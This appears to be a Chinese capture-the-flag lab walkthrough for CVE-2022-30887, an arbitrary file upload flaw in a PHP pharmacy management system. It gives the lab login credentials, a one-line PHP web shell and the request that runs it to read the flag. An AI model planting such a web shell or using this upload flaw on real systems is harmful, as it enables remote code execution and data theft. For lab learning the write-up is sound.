文章目录
- CVE-2022-30887
- 一、漏洞介绍
- 二、渗透步骤
- 1、打开网站
- 2、登录网站
- 3、shell
- 4、文件上传
- 5、查看flag
CVE-2022-30887
一、漏洞介绍
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
二、渗透步骤
1、打开网站
URL:http://eci-2zeh9ogurma94pas3owb.cloudeci1.ichunqiu.com/login.php
2、登录网站
# 邮箱:mayuri.infospace@gmail.com
# 密码:mayurik
3、shell
<?php
system($_GET[1]);
?>
4、文件上传
5、查看flag
URL:http://eci-2zeh9ogurma94pas3owb.cloudeci1.ichunqiu.com/assets/myimages/ant.php?1=cat%20/flag
?1=cat /flag
